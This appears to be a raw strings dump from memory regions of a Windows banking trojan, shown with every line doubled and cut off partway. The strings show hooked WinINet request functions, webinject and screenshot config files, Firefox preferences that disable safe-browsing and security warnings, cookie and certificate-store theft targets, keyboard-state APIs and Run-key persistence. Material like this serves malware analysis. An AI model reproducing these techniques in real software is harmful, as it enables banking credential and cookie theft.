\\.\pipe\processingpipe_
\\.\pipe\processingpipe_
services.exe
services.exe
csrss.exe
csrss.exe
smss.exe
smss.exe
\\.\pipe\globpluginspipe
\\.\pipe\globpluginspipe
X X
X X
user_pref("browser.safebrowsing.enabled", false);
user_pref("browser.safebrowsing.enabled", false);
user_pref("browser.safebrowsing.malware.enabled", false);
user_pref("browser.safebrowsing.malware.enabled", false);
user_pref("security.warn_entering_weak", false);
user_pref("security.warn_entering_weak", false);
user_pref("security.warn_entering_weak.show_once", false);
user_pref("security.warn_entering_weak.show_once", false);
user_pref("security.warn_viewing_mixed", false);
user_pref("security.warn_viewing_mixed", false);
user_pref("security.warn_viewing_mixed.show_once", false);
user_pref("security.warn_viewing_mixed.show_once", false);
user_pref("privacy.clearOnShutdown.cookies", false);
user_pref("privacy.clearOnShutdown.cookies", false);
user_pref("privacy.clearOnShutdown.sessions", false);
user_pref("privacy.clearOnShutdown.sessions", false);
/Mozilla/Firefox/profiles.ini
/Mozilla/Firefox/profiles.ini
/Mozilla/Firefox/
/Mozilla/Firefox/
nspr4.dll
nspr4.dll
seieapiXX
seieapiXX
%s\Content.IE5\0
%s\Content.IE5\0
%s\Content.IE5\%s
%s\Content.IE5\%s
\Content.IE5\*.*
\Content.IE5\*.*
set_url
set_url
PFXImportCertStore
PFXImportCertStore
user32.dll
user32.dll
%d.%d.%d
%d.%d.%d
keys
keys
http:
http:
urlmask
urlmask
cert
cert
%s%s%s
%s%s%s
[ERROR] : CreateProcess("%s", ..., "%s") fails : dwFileSize == 0xX; dwCrc32 == 0xX : dwErr == %d
[ERROR] : CreateProcess("%s", ..., "%s") fails : dwFileSize == 0xX; dwCrc32 == 0xX : dwErr == %d
[ERROR] : DumpPage("%s", "%s") fails : dwErr == %d
[ERROR] : DumpPage("%s", "%s") fails : dwErr == %d
[ERROR] : Empty szLink? : dwErr == %d
[ERROR] : Empty szLink? : dwErr == %d
[ERROR] : Empty report. Unknown error : dwErr == %d
[ERROR] : Empty report. Unknown error : dwErr == %d
[ERROR] : Thread is really sloppy : dwErr == %d
[ERROR] : Thread is really sloppy : dwErr == %d
[ERROR] : Cannot create thread. 0o : dwErr == %d
[ERROR] : Cannot create thread. 0o : dwErr == %d
%d-%d-%d
%d-%d-%d
collectors.txt
collectors.txt
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\%d
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\%d
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d
ProxyHttp1.1
ProxyHttp1.1
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
EnableHttp1_1
EnableHttp1_1
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
hXXp://
hXXp://
hXXps://
hXXps://
HTTP/1.
HTTP/1.
.mpeg
.mpeg
.jpeg
.jpeg
%s&tid=%s&%s
%s&tid=%s&%s
TakeBotExeMd5Callback
TakeBotExeMd5Callback
TakeOriginal_HttpSendRequestW
TakeOriginal_HttpSendRequestW
TakeOriginal_HttpSendRequestA
TakeOriginal_HttpSendRequestA
TakeOriginal_HttpOpenRequestA
TakeOriginal_HttpOpenRequestA
TakeOriginal_HttpAddRequestHeadersA
TakeOriginal_HttpAddRequestHeadersA
Callback_OnBeforeProcessUrl
Callback_OnBeforeProcessUrl
HttpQueryInfoA
HttpQueryInfoA
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestA
wlcomm.exe
wlcomm.exe
msmsgs.exe
msmsgs.exe
msnmsgr.exe
msnmsgr.exe
PR_OpenTCPSocket
PR_OpenTCPSocket
kernel32.dll
kernel32.dll
Crypt32.dll
Crypt32.dll
Advapi32.dll
Advapi32.dll
ws2_32.dll
ws2_32.dll
wininet.dll
wininet.dll
Ht.Ht!HHt
Ht.Ht!HHt
w SSh
w SSh
SSSSh
SSSSh
t.VPW
t.VPW
%System%\WININET.dll
%System%\WININET.dll
C:\trivax1.Bin\config.bin
C:\trivax1.Bin\config.bin
%System%\ntdll.dll
%System%\ntdll.dll
%System%\USER32.dll
%System%\USER32.dll
%System%\CRYPT32.dll
%System%\CRYPT32.dll
C:\trivax1.Bin\trivax1.Bin.exe
C:\trivax1.Bin\trivax1.Bin.exe
C:\trivax1.Bin\
C:\trivax1.Bin\
trivax1.Bin.exe
trivax1.Bin.exe
config.bin
config.bin
o0Iu6US.exe
o0Iu6US.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
5.1.2600!XP7!A8A67A25
5.1.2600!XP7!A8A67A25
trivax1.Bin
trivax1.Bin
Microsoft Windows
Microsoft Windows
%System%\ADVAPI32.dll
%System%\ADVAPI32.dll
%System%\WS2_32.dll
%System%\WS2_32.dll
PFXExportCertStoreEx
PFXExportCertStoreEx
CertCloseStore
CertCloseStore
CertAddCertificateContextToStore
CertAddCertificateContextToStore
CertOpenStore
CertOpenStore
CertGetCertificateContextProperty
CertGetCertificateContextProperty
CertDeleteCertificateFromStore
CertDeleteCertificateFromStore
CertDuplicateCertificateContext
CertDuplicateCertificateContext
CertNameToStrA
CertNameToStrA
CertEnumCertificatesInStore
CertEnumCertificatesInStore
CertOpenSystemStoreA
CertOpenSystemStoreA
CRYPT32.dll
CRYPT32.dll
ntdll.dll
ntdll.dll
WS2_32.dll
WS2_32.dll
FindCloseUrlCache
FindCloseUrlCache
FindNextUrlCacheEntryA
FindNextUrlCacheEntryA
DeleteUrlCacheEntry
DeleteUrlCacheEntry
FindFirstUrlCacheEntryA
FindFirstUrlCacheEntryA
InternetCrackUrlA
InternetCrackUrlA
InternetCanonicalizeUrlA
InternetCanonicalizeUrlA
GetUrlCacheEntryInfoW
GetUrlCacheEntryInfoW
WININET.dll
WININET.dll
SHLWAPI.dll
SHLWAPI.dll
GetProcessHeap
GetProcessHeap
DisconnectNamedPipe
DisconnectNamedPipe
ConnectNamedPipe
ConnectNamedPipe
CreateNamedPipeA
CreateNamedPipeA
WaitNamedPipeA
WaitNamedPipeA
KERNEL32.dll
KERNEL32.dll
GetKeyboardState
GetKeyboardState
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
EnumWindows
EnumWindows
GetKeyState
GetKeyState
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
RegCloseKey
RegCloseKey
RegCreateKeyExA
RegCreateKeyExA
RegOpenKeyExA
RegOpenKeyExA
CryptDestroyKey
CryptDestroyKey
CryptGetKeyParam
CryptGetKeyParam
CryptGetUserKey
CryptGetUserKey
ADVAPI32.dll
ADVAPI32.dll
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
3-33383|3
3-33383|3
6"6(6-676
6"6(6-676
RapportUtil.
RapportUtil.
(GMT %su:u) %s
(GMT %su:u) %s
\prefs.js
\prefs.js
RapportTanzan36.
RapportTanzan36.
RapportKoan.
RapportKoan.
winlogon.exe_680_rwx_0BAD0000_00045000:
.text
.text
.reloc
.reloc
config.dat
config.dat
explorer.exe
explorer.exe
webinjects.txt
webinjects.txt
screenshots.txt
screenshots.txt
threadmetadata!nfo%d
threadmetadata!nfo%d
XX
XX
SOFTWARE\Microsoft Windows
SOFTWARE\Microsoft Windows
u.u.u u:u:u.u
u.u.u u:u:u.u
0xx
0xx
(%d bytes)
(%d bytes)
INTERNET_FLAG_PASSIVE
INTERNET_FLAG_PASSIVE
INTERNET_FLAG_IGNORE_CERT_CN_INVALID
INTERNET_FLAG_IGNORE_CERT_CN_INVALID
INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP
INTERNET_OPTION_SERVER_CERT_CHAIN_CONTEXT
INTERNET_OPTION_SERVER_CERT_CHAIN_CONTEXT
INTERNET_OPTION_ENABLE_PASSPORT_AUTH
INTERNET_OPTION_ENABLE_PASSPORT_AUTH
INTERNET_OPTION_EXEMPT_CONNECTION_LIMIT
INTERNET_OPTION_EXEMPT_CONNECTION_LIMIT
INTERNET_OPTION_DISABLE_PASSPORT_AUTH
INTERNET_OPTION_DISABLE_PASSPORT_AUTH
INTERNET_OPTION_CLIENT_CERT_CONTEXT
INTERNET_OPTION_CLIENT_CERT_CONTEXT
INTERNET_OPTION_HTTP_DECODING
INTERNET_OPTION_HTTP_DECODING
INTERNET_OPTION_BYPASS_EDITED_ENTRY
INTERNET_OPTION_BYPASS_EDITED_ENTRY
INTERNET_OPTION_RESET_URLCACHE_SESSION
INTERNET_OPTION_RESET_URLCACHE_SESSION
INTERNET_OPTION_HTTP_VERSION
INTERNET_OPTION_HTTP_VERSION
INTERNET_OPTION_SECONDARY_CACHE_KEY
INTERNET_OPTION_SECONDARY_CACHE_KEY
INTERNET_OPTION_SECURITY_SELECT_CLIENT_CERT
INTERNET_OPTION_SECURITY_SELECT_CLIENT_CERT
INTERNET_OPTION_PROXY_PASSWORD
INTERNET_OPTION_PROXY_PASSWORD
INTERNET_OPTION_SECURITY_KEY_BITNESS
INTERNET_OPTION_SECURITY_KEY_BITNESS
INTERNET_OPTION_SECURITY_CERTIFICATE
INTERNET_OPTION_SECURITY_CERTIFICATE
INTERNET_OPTION_URL
INTERNET_OPTION_URL
INTERNET_OPTION_SECURITY_CERTIFICATE_STRUCT
INTERNET_OPTION_SECURITY_CERTIFICATE_STRUCT
INTERNET_OPTION_PASSWORD
INTERNET_OPTION_PASSWORD
HTTP_QUERY_FLAG_COALESCE
HTTP_QUERY_FLAG_COALESCE
HTTP_QUERY_FLAG_NUMBER
HTTP_QUERY_FLAG_NUMBER
HTTP_QUERY_FLAG_SYSTEMTIME
HTTP_QUERY_FLAG_SYSTEMTIME
HTTP_QUERY_FLAG_REQUEST_HEADERS
HTTP_QUERY_FLAG_REQUEST_HEADERS
HTTP_QUERY_UNKNOWN
HTTP_QUERY_UNKNOWN
HTTP_QUERY_CUSTOM
HTTP_QUERY_CUSTOM
HTTP_QUERY_PASSPORT_CONFIG
HTTP_QUERY_PASSPORT_CONFIG
HTTP_QUERY_PASSPORT_URLS
HTTP_QUERY_PASSPORT_URLS
HTTP_QUERY_AUTHENTICATION_INFO
HTTP_QUERY_AUTHENTICATION_INFO
HTTP_QUERY_PROXY_SUPPORT
HTTP_QUERY_PROXY_SUPPORT
HTTP_QUERY_ECHO_HEADERS_CRLF
HTTP_QUERY_ECHO_HEADERS_CRLF
HTTP_QUERY_ECHO_HEADERS
HTTP_QUERY_ECHO_HEADERS
HTTP_QUERY_ECHO_REPLY
HTTP_QUERY_ECHO_REPLY
HTTP_QUERY_ECHO_REQUEST
HTTP_QUERY_ECHO_REQUEST
HTTP_QUERY_UNLESS_MODIFIED_SINCE
HTTP_QUERY_UNLESS_MODIFIED_SINCE
HTTP_QUERY_PROXY_CONNECTION
HTTP_QUERY_PROXY_CONNECTION
HTTP_QUERY_EXPECT
HTTP_QUERY_EXPECT
HTTP_QUERY_WARNING
HTTP_QUERY_WARNING
HTTP_QUERY_VIA
HTTP_QUERY_VIA
HTTP_QUERY_VARY
HTTP_QUERY_VARY
HTTP_QUERY_UPGRADE
HTTP_QUERY_UPGRADE
HTTP_QUERY_TRANSFER_ENCODING
HTTP_QUERY_TRANSFER_ENCODING
HTTP_QUERY_RANGE
HTTP_QUERY_RANGE
HTTP_QUERY_PROXY_AUTHORIZATION
HTTP_QUERY_PROXY_AUTHORIZATION
HTTP_QUERY_MAX_FORWARDS
HTTP_QUERY_MAX_FORWARDS
HTTP_QUERY_IF_UNMODIFIED_SINCE
HTTP_QUERY_IF_UNMODIFIED_SINCE
HTTP_QUERY_IF_RANGE
HTTP_QUERY_IF_RANGE
HTTP_QUERY_IF_NONE_MATCH
HTTP_QUERY_IF_NONE_MATCH
HTTP_QUERY_IF_MATCH
HTTP_QUERY_IF_MATCH
HTTP_QUERY_HOST
HTTP_QUERY_HOST
HTTP_QUERY_ETAG
HTTP_QUERY_ETAG
HTTP_QUERY_CONTENT_RANGE
HTTP_QUERY_CONTENT_RANGE
HTTP_QUERY_CONTENT_MD5
HTTP_QUERY_CONTENT_MD5
HTTP_QUERY_CONTENT_LOCATION
HTTP_QUERY_CONTENT_LOCATION
HTTP_QUERY_CONTENT_BASE
HTTP_QUERY_CONTENT_BASE
HTTP_QUERY_CACHE_CONTROL
HTTP_QUERY_CACHE_CONTROL
HTTP_QUERY_AGE
HTTP_QUERY_AGE
HTTP_QUERY_CONTENT_DISPOSITION
HTTP_QUERY_CONTENT_DISPOSITION
HTTP_QUERY_REFRESH
HTTP_QUERY_REFRESH
HTTP_QUERY_REQUEST_METHOD
HTTP_QUERY_REQUEST_METHOD
HTTP_QUERY_COOKIE
HTTP_QUERY_COOKIE
HTTP_QUERY_SET_COOKIE
HTTP_QUERY_SET_COOKIE
HTTP_QUERY_ACCEPT_RANGES
HTTP_QUERY_ACCEPT_RANGES
HTTP_QUERY_PROXY_AUTHENTICATE
HTTP_QUERY_PROXY_AUTHENTICATE
HTTP_QUERY_WWW_AUTHENTICATE
HTTP_QUERY_WWW_AUTHENTICATE
HTTP_QUERY_USER_AGENT
HTTP_QUERY_USER_AGENT
HTTP_QUERY_TITLE
HTTP_QUERY_TITLE
HTTP_QUERY_SERVER
HTTP_QUERY_SERVER
HTTP_QUERY_RETRY_AFTER
HTTP_QUERY_RETRY_AFTER
HTTP_QUERY_REFERER
HTTP_QUERY_REFERER
HTTP_QUERY_ORIG_URI
HTTP_QUERY_ORIG_URI
HTTP_QUERY_LOCATION
HTTP_QUERY_LOCATION
HTTP_QUERY_IF_MODIFIED_SINCE
HTTP_QUERY_IF_MODIFIED_SINCE
HTTP_QUERY_FROM
HTTP_QUERY_FROM
HTTP_QUERY_FORWARDED
HTTP_QUERY_FORWARDED
HTTP_QUERY_CONTENT_ENCODING
HTTP_QUERY_CONTENT_ENCODING
HTTP_QUERY_AUTHORIZATION
HTTP_QUERY_AUTHORIZATION
HTTP_QUERY_ACCEPT_LANGUAGE
HTTP_QUERY_ACCEPT_LANGUAGE
HTTP_QUERY_ACCEPT_ENCODING
HTTP_QUERY_ACCEPT_ENCODING
HTTP_QUERY_ACCEPT_CHARSET
HTTP_QUERY_ACCEPT_CHARSET
HTTP_QUERY_ACCEPT
HTTP_QUERY_ACCEPT
HTTP_QUERY_CONNECTION
HTTP_QUERY_CONNECTION
HTTP_QUERY_RAW_HEADERS_CRLF
HTTP_QUERY_RAW_HEADERS_CRLF
HTTP_QUERY_RAW_HEADERS
HTTP_QUERY_RAW_HEADERS
HTTP_QUERY_STATUS_TEXT
HTTP_QUERY_STATUS_TEXT
HTTP_QUERY_STATUS_CODE
HTTP_QUERY_STATUS_CODE
HTTP_QUERY_VERSION
HTTP_QUERY_VERSION
HTTP_QUERY_PRAGMA
HTTP_QUERY_PRAGMA
HTTP_QUERY_LINK
HTTP_QUERY_LINK
HTTP_QUERY_COST
HTTP_QUERY_COST
HTTP_QUERY_DERIVED_FROM
HTTP_QUERY_DERIVED_FROM
HTTP_QUERY_URI
HTTP_QUERY_URI
HTTP_QUERY_MESSAGE_ID
HTTP_QUERY_MESSAGE_ID
HTTP_QUERY_LAST_MODIFIED
HTTP_QUERY_LAST_MODIFIED
HTTP_QUERY_EXPIRES
HTTP_QUERY_EXPIRES
HTTP_QUERY_DATE
HTTP_QUERY_DATE
HTTP_QUERY_PUBLIC
HTTP_QUERY_PUBLIC
HTTP_QUERY_ALLOW
HTTP_QUERY_ALLOW
HTTP_QUERY_CONTENT_LANGUAGE
HTTP_QUERY_CONTENT_LANGUAGE
HTTP_QUERY_CONTENT_LENGTH
HTTP_QUERY_CONTENT_LENGTH
HTTP_QUERY_CONTENT_DESCRIPTION
HTTP_QUERY_CONTENT_DESCRIPTION
HTTP_QUERY_CONTENT_ID
HTTP_QUERY_CONTENT_ID
HTTP_QUERY_CONTENT_TRANSFER_ENCODING
HTTP_QUERY_CONTENT_TRANSFER_ENCODING
HTTP_QUERY_CONTENT_TYPE
HTTP_QUERY_CONTENT_TYPE
HTTP_QUERY_MIME_VERSION
HTTP_QUERY_MIME_VERSION
Content-Length: %u
Content-Length: %u
HTTP/
HTTP/
SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
\\.\pipe\globpluginsuninstallpipe
\\.\pipe\globpluginsuninstallpipe
cookies-nontor.xml
cookies-nontor.xml
cookies.txt
cookies.txt
sessionstore.js
sessionstore.js
sessionstore.bak
sessionstore.bak
cookies.sqlite-journal
cookies.sqlite-journal
cookies.sqlite
cookies.sqlite
GdiplusShutdown
GdiplusShutdown
gdiplus.dll
gdiplus.dll
\\.\pipe\processingpipe_
\\.\pipe\processingpipe_
services.exe
services.exe
csrss.exe
csrss.exe
smss.exe
smss.exe
\\.\pipe\globpluginspipe
\\.\pipe\globpluginspipe
X X
X X
user_pref("browser.safebrowsing.enabled", false);
user_pref("browser.safebrowsing.enabled", false);
user_pref("browser.safebrowsing.malware.enabled", false);
user_pref("browser.safebrowsing.malware.enabled", false);
user_pref("security.warn_entering_weak", false);
user_pref("security.warn_entering_weak", false);
user_pref("security.warn_entering_weak.show_once", false);
user_pref("security.warn_entering_weak.show_once", false);
user_pref("security.warn_viewing_mixed", false);
user_pref("security.warn_viewing_mixed", false);
user_pref("security.warn_viewing_mixed.show_once", false);
user_pref("security.warn_viewing_mixed.show_once", false);
user_pref("privacy.clearOnShutdown.cookies", false);
user_pref("privacy.clearOnShutdown.cookies", false);
user_pref("privacy.clearOnShutdown.sessions", false);
user_pref("privacy.clearOnShutdown.sessions", false);
/Mozilla/Firefox/profiles.ini
/Mozilla/Firefox/profiles.ini
/Mozilla/Firefox/
/Mozilla/Firefox/
nspr4.dll
nspr4.dll
seieapiXX
seieapiXX
%s\Content.IE5\0
%s\Content.IE5\0
%s\Content.IE5\%s
%s\Content.IE5\%s
\Content.IE5\*.*
\Content.IE5\*.*
set_url
set_url
PFXImportCertStore
PFXImportCertStore
user32.dll
user32.dll
%d.%d.%d
%d.%d.%d
keys
keys
http:
http:
urlmask
urlmask
cert
cert
%s%s%s
%s%s%s
[ERROR] : CreateProcess("%s", ..., "%s") fails : dwFileSize == 0xX; dwCrc32 == 0xX : dwErr == %d
[ERROR] : CreateProcess("%s", ..., "%s") fails : dwFileSize == 0xX; dwCrc32 == 0xX : dwErr == %d
[ERROR] : DumpPage("%s", "%s") fails : dwErr == %d
[ERROR] : DumpPage("%s", "%s") fails : dwErr == %d
[ERROR] : Empty szLink? : dwErr == %d
[ERROR] : Empty szLink? : dwErr == %d
[ERROR] : Empty report. Unknown error : dwErr == %d
[ERROR] : Empty report. Unknown error : dwErr == %d
[ERROR] : Thread is really sloppy : dwErr == %d
[ERROR] : Thread is really sloppy : dwErr == %d
[ERROR] : Cannot create thread. 0o : dwErr == %d
[ERROR] : Cannot create thread. 0o : dwErr == %d
%d-%d-%d
%d-%d-%d
collectors.txt
collectors.txt
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\%d
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\%d
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d
ProxyHttp1.1
ProxyHttp1.1
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
EnableHttp1_1
EnableHttp1_1
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
hXXp://
hXXp://
hXXps://
hXXps://
HTTP/1.
HTTP/1.
.mpeg
.mpeg
.jpeg
.jpeg
%s&tid=%s&%s
%s&tid=%s&%s
TakeBotExeMd5Callback
TakeBotExeMd5Callback
TakeOriginal_HttpSendRequestW
TakeOriginal_HttpSendRequestW
TakeOriginal_HttpSendRequestA
TakeOriginal_HttpSendRequestA
TakeOriginal_HttpOpenRequestA
TakeOriginal_HttpOpenRequestA
TakeOriginal_HttpAddRequestHeadersA
TakeOriginal_HttpAddRequestHeadersA
Callback_OnBeforeProcessUrl
Callback_OnBeforeProcessUrl
HttpQueryInfoA
HttpQueryInfoA
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestA
wlcomm.exe
wlcomm.exe
msmsgs.exe
msmsgs.exe
msnmsgr.exe
msnmsgr.exe
PR_OpenTCPSocket
PR_OpenTCPSocket
kernel32.dll
kernel32.dll
Crypt32.dll
Crypt32.dll
Advapi32.dll
Advapi32.dll
ws2_32.dll
ws2_32.dll
wininet.dll
wininet.dll
Ht.Ht!HHt
Ht.Ht!HHt
w SSh
w SSh
SSSSh
SSSSh
t.VPW
t.VPW
%System%\WININET.dll
%System%\WININET.dll
C:\trivax1.Bin\config.bin
C:\trivax1.Bin\config.bin
%System%\ntdll.dll
%System%\ntdll.dll
%System%\USER32.dll
%System%\USER32.dll
%System%\CRYPT32.dll
%System%\CRYPT32.dll
C:\trivax1.Bin\trivax1.Bin.exe
C:\trivax1.Bin\trivax1.Bin.exe
C:\trivax1.Bin\
C:\trivax1.Bin\
trivax1.Bin.exe
trivax1.Bin.exe
config.bin
config.bin
o0Iu6US.exe
o0Iu6US.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
5.1.2600!XP7!A8A67A25
5.1.2600!XP7!A8A67A25
trivax1.Bin
trivax1.Bin
Microsoft Windows
Microsoft Windows
%System%\ADVAPI32.dll
%System%\ADVAPI32.dll
%System%\WS2_32.dll
%System%\WS2_32.dll
PFXExportCertStoreEx
PFXExportCertStoreEx
CertCloseStore
CertCloseStore
CertAddCertificateContextToStore
CertAddCertificateContextToStore
CertOpenStore
CertOpenStore
CertGetCertificateContextProperty
CertGetCertificateContextProperty
CertDeleteCertificateFromStore
CertDeleteCertificateFromStore
CertDuplicateCertificateContext
CertDuplicateCertificateContext
CertNameToStrA
CertNameToStrA
CertEnumCertificatesInStore
CertEnumCertificatesInStore
CertOpenSystemStoreA
CertOpenSystemStoreA
CRYPT32.dll
CRYPT32.dll
ntdll.dll
ntdll.dll
WS2_32.dll
WS2_32.dll
FindCloseUrlCache
FindCloseUrlCache
FindNextUrlCacheEntryA
FindNextUrlCacheEntryA
DeleteUrlCacheEntry
DeleteUrlCacheEntry
FindFirstUrlCacheEntryA
FindFirstUrlCacheEntryA
InternetCrackUrlA
InternetCrackUrlA
InternetCanonicalizeUrlA
InternetCanonicalizeUrlA
GetUrlCacheEntryInfoW
GetUrlCacheEntryInfoW
WININET.dll
WININET.dll
SHLWAPI.dll
SHLWAPI.dll
GetProcessHeap
GetProcessHeap
DisconnectNamedPipe
DisconnectNamedPipe
ConnectNamedPipe
ConnectNamedPipe
CreateNamedPipeA
CreateNamedPipeA
WaitNamedPipeA
WaitNamedPipeA
KERNEL32.dll
KERNEL32.dll
GetKeyboardState
GetKeyboardState
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
EnumWindows
EnumWindows
GetKeyState
GetKeyState
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
RegCloseKey
RegCloseKey
RegCreateKeyExA
RegCreateKeyExA
RegOpenKeyExA
RegOpenKeyExA
CryptDestroyKey
CryptDestroyKey
CryptGetKeyParam
CryptGetKeyParam
CryptGetUserKey
CryptGetUserKey
ADVAPI32.dll
ADVAPI32.dll
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
3-33383|3
3-33383|3
6"6(6-676
6"6(6-676
RapportUtil.
RapportUtil.
(GMT %su:u) %s
(GMT %su:u) %s
\prefs.js
\prefs.js
RapportTanzan36.
RapportTanzan36.
RapportKoan.
RapportKoan.
lsass.exe_736_rwx_0BAD0000_00045000:
.text
.text
.reloc
.reloc
config.dat
config.dat
explorer.exe
explorer.exe
webinjects.txt
webinjects.txt
screenshots.txt
screenshots.txt
threadmetadata!nfo%d
threadmetadata!nfo%d
XX
XX
SOFTWARE\Microsoft Windows
SOFTWARE\Microsoft Windows
u.u.u u:u:u.u
u.u.u u:u:u.u
0xx
0xx
(%d bytes)
(%d bytes)
INTERNET_FLAG_PASSIVE
INTERNET_FLAG_PASSIVE
INTERNET_FLAG_IGNORE_CERT_CN_INVALID
INTERNET_FLAG_IGNORE_CERT_CN_INVALID
INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP
INTERNET_OPTION_SERVER_CERT_CHAIN_CONTEXT
INTERNET_OPTION_SERVER_CERT_CHAIN_CONTEXT
INTERNET_OPTION_ENABLE_PASSPORT_AUTH
INTERNET_OPTION_ENABLE_PASSPORT_AUTH
INTERNET_OPTION_EXEMPT_CONNECTION_LIMIT
INTERNET_OPTION_EXEMPT_CONNECTION_LIMIT
INTERNET_OPTION_DISABLE_PASSPORT_AUTH
INTERNET_OPTION_DISABLE_PASSPORT_AUTH
INTERNET_OPTION_CLIENT_CERT_CONTEXT
INTERNET_OPTION_CLIENT_CERT_CONTEXT
INTERNET_OPTION_HTTP_DECODING
INTERNET_OPTION_HTTP_DECODING
INTERNET_OPTION_BYPASS_EDITED_ENTRY
INTERNET_OPTION_BYPASS_EDITED_ENTRY
INTERNET_OPTION_RESET_URLCACHE_SESSION
INTERNET_OPTION_RESET_URLCACHE_SESSION
INTERNET_OPTION_HTTP_VERSION
INTERNET_OPTION_HTTP_VERSION
INTERNET_OPTION_SECONDARY_CACHE_KEY
INTERNET_OPTION_SECONDARY_CACHE_KEY
INTERNET_OPTION_SECURITY_SELECT_CLIENT_CERT
INTERNET_OPTION_SECURITY_SELECT_CLIENT_CERT
INTERNET_OPTION_PROXY_PASSWORD
INTERNET_OPTION_PROXY_PASSWORD
INTERNET_OPTION_SECURITY_KEY_BITNESS
INTERNET_OPTION_SECURITY_KEY_BITNESS
INTERNET_OPTION_SECURITY_CERTIFICATE
INTERNET_OPTION_SECURITY_CERTIFICATE
INTERNET_OPTION_URL
INTERNET_OPTION_URL
INTERNET_OPTION_SECURITY_CERTIFICATE_STRUCT
INTERNET_OPTION_SECURITY_CERTIFICATE_STRUCT
INTERNET_OPTION_PASSWORD
INTERNET_OPTION_PASSWORD
HTTP_QUERY_FLAG_COALESCE
HTTP_QUERY_FLAG_COALESCE
HTTP_QUERY_FLAG_NUMBER
HTTP_QUERY_FLAG_NUMBER
HTTP_QUERY_FLAG_SYSTEMTIME
HTTP_QUERY_FLAG_SYSTEMTIME
HTTP_QUERY_FLAG_REQUEST_HEADERS
HTTP_QUERY_FLAG_REQUEST_HEADERS
HTTP_QUERY_UNKNOWN
HTTP_QUERY_UNKNOWN
HTTP_QUERY_CUSTOM
HTTP_QUERY_CUSTOM
HTTP_QUERY_PASSPORT_CONFIG
HTTP_QUERY_PASSPORT_CONFIG
HTTP_QUERY_PASSPORT_URLS
HTTP_QUERY_PASSPORT_URLS
HTTP_QUERY_AUTHENTICATION_INFO
HTTP_QUERY_AUTHENTICATION_INFO
HTTP_QUERY_PROXY_SUPPORT
HTTP_QUERY_PROXY_SUPPORT
HTTP_QUERY_ECHO_HEADERS_CRLF
HTTP_QUERY_ECHO_HEADERS_CRLF
HTTP_QUERY_ECHO_HEADERS
HTTP_QUERY_ECHO_HEADERS
HTTP_QUERY_ECHO_REPLY
HTTP_QUERY_ECHO_REPLY
HTTP_QUERY_ECHO_REQUEST
HTTP_QUERY_ECHO_REQUEST
HTTP_QUERY_UNLESS_MODIFIED_SINCE
HTTP_QUERY_UNLESS_MODIFIED_SINCE
HTTP_QUERY_PROXY_CONNECTION
HTTP_QUERY_PROXY_CONNECTION
HTTP_QUERY_EXPECT
HTTP_QUERY_EXPECT
HTTP_QUERY_WARNING
HTTP_QUERY_WARNING
HTTP_QUERY_VIA
HTTP_QUERY_VIA
HTTP_QUERY_VARY
HTTP_QUERY_VARY
HTTP_QUERY_UPGRADE
HTTP_QUERY_UPGRADE
HTTP_QUERY_TRANSFER_ENCODING
HTTP_QUERY_TRANSFER_ENCODING
HTTP_QUERY_RANGE
HTTP_QUERY_RANGE
HTTP_QUERY_PROXY_AUTHORIZATION
HTTP_QUERY_PROXY_AUTHORIZATION
HTTP_QUERY_MAX_FORWARDS
HTTP_QUERY_MAX_FORWARDS
HTTP_QUERY_IF_UNMODIFIED_SINCE
HTTP_QUERY_IF_UNMODIFIED_SINCE
HTTP_QUERY_IF_RANGE
HTTP_QUERY_IF_RANGE
HTTP_QUERY_IF_NONE_MATCH
HTTP_QUERY_IF_NONE_MATCH
HTTP_QUERY_IF_MATCH
HTTP_QUERY_IF_MATCH
HTTP_QUERY_HOST
HTTP_QUERY_HOST
HTTP_QUERY_ETAG
HTTP_QUERY_ETAG
HTTP_QUERY_CONTENT_RANGE
HTTP_QUERY_CONTENT_RANGE
HTTP_QUERY_CONTENT_MD5
HTTP_QUERY_CONTENT_MD5
HTTP_QUERY_CONTENT_LOCATION
